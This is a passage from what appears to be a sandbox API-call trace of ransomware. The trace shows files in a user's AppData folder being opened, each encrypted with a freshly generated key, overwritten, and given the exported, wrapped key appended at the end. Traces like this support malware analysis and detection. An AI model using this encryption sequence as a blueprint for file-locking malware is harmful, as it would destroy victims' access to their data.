HALPmcxz\\AppData\\Roaming\\vs4QWfqcPFXF.ots", dwFileAttributes=0x80) returned 1 [0150.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\vs4QWfqcPFXF.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vs4qwfqcpfxf.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.709] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=6980) returned 1 [0150.709] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=6980) returned 1 [0150.709] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1a22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.709] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.709] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.709] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.709] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.710] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.710] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1b44, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1b44, lpOverlapped=0x0) returned 1 [0150.710] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.710] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1b44, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1b50) returned 1 [0150.710] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.710] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x1b50, lpOverlapped=0x0) returned 1 [0150.710] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.710] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.710] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.710] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.710] CloseHandle (hObject=0x18c) returned 1 [0150.727] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.731] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.731] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.731] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\W8IhnLWmu7yCBSxhyy.bmp", dwFileAttributes=0x80) returned 1 [0150.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\W8IhnLWmu7yCBSxhyy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w8ihnlwmu7ycbsxhyy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.732] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=43206) returned 1 [0150.732] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=43206) returned 1 [0150.732] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xa7a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.732] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.732] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.732] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.732] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.732] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.732] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa8c6, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xa8c6, lpOverlapped=0x0) returned 1 [0150.733] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.733] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa8c6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa8d0) returned 1 [0150.733] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.733] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa8d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xa8d0, lpOverlapped=0x0) returned 1 [0150.734] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.734] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.734] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.734] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.734] CloseHandle (hObject=0x18c) returned 1 [0150.750] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.754] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.754] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.754] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WsIx Q8E zk.png", dwFileAttributes=0x80) returned 1 [0150.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WsIx Q8E zk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsix q8e zk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.754] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=28178) returned 1 [0150.754] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=28178) returned 1 [0150.754] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x6cf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.755] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.755] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.755] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.755] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.755] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.755] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x6e12, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x6e12, lpOverlapped=0x0) returned 1 [0150.756] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.756] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x6e12, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x6e20) returned 1 [0150.756] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.756] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6e20, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x6e20, lpOverlapped=0x0) returned 1 [0150.756] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.756] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.756] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.756] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.756] CloseHandle (hObject=0x18c) returned 1 [0150.772] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.777] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.777] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.777] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wT3KKV5LSORECEJC.bmp", dwFileAttributes=0x80) returned 1 [0150.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wT3KKV5LSORECEJC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wt3kkv5lsorecejc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.777] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=37009) returned 1 [0150.777] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=37009) returned 1 [0150.778] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x8f6f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.778] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.778] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.778] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.778] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.779] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.779] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9091, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x9091, lpOverlapped=0x0) returned 1 [0150.779] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.779] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9091, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90a0) returned 1 [0150.779] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.779] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90a0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90a0, lpOverlapped=0x0) returned 1 [0150.780] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.780] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.780] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.780] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.780] CloseHandle (hObject=0x18c) returned 1 [0150.797] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.801] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.801] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.801] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XsrHWz4c S2TtjJ8xdSO.bmp", dwFileAttributes=0x80) returned 1 [0150.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XsrHWz4c S2TtjJ8xdSO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsrhwz4c s2ttjj8xdso.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.802] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=24879) returned 1 [0150.802] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=24879) returned 1 [0150.802] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x600d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.802] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.802] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.802] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.802] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.803] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.803] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x612f, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x612f, lpOverlapped=0x0) returned 1 [0150.803] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.803] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x612f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x6130) returned 1 [0150.803] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.803] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6130, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x6130, lpOverlapped=0x0) returned 1 [0150.803] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.803] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.803] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.804] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.804] CloseHandle (hObject=0x18c) returned 1 [0150.830] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.833] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.834] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.834] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xu_PiqbthIOK9.mp4", dwFileAttributes=0x80) returned 1 [0150.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xu_PiqbthIOK9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xu_piqbthiok9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.834] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=3519) returned 1 [0150.834] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=3519) returned 1 [0150.834] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xc9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.834] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.835] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.835] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.835] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.835] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.835] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdbf, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xdbf, lpOverlapped=0x0) returned 1 [0150.835] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.836] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xdbf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xdc0) returned 1 [0150.836] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.836] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xdc0, lpOverlapped=0x0) returned 1 [0150.836] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.836] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.836] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.836] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) 